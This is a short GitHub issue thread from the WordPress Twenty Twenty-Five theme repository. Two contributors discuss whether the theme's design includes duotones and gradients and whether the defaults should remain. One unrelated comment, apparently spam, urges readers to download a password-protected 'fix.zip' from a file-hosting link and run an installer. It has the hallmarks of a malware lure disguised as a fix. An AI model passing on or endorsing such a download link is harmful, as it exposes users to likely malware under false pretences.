### ISSUE TITLE
Design:  Duotones and gradients

### ISSUE THREAD

**Issue by carolinan** [WordPress/twentytwentyfive#122]
**Is your feature request related to a problem? Please describe.**

@beafialho I do not see duotones and gradients on Figma.
And should the defaults be turned off?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by beafialho** [comment]
The theme does not contemplate any duotones or gradients. For that reason, we could perhaps leave the defaults.
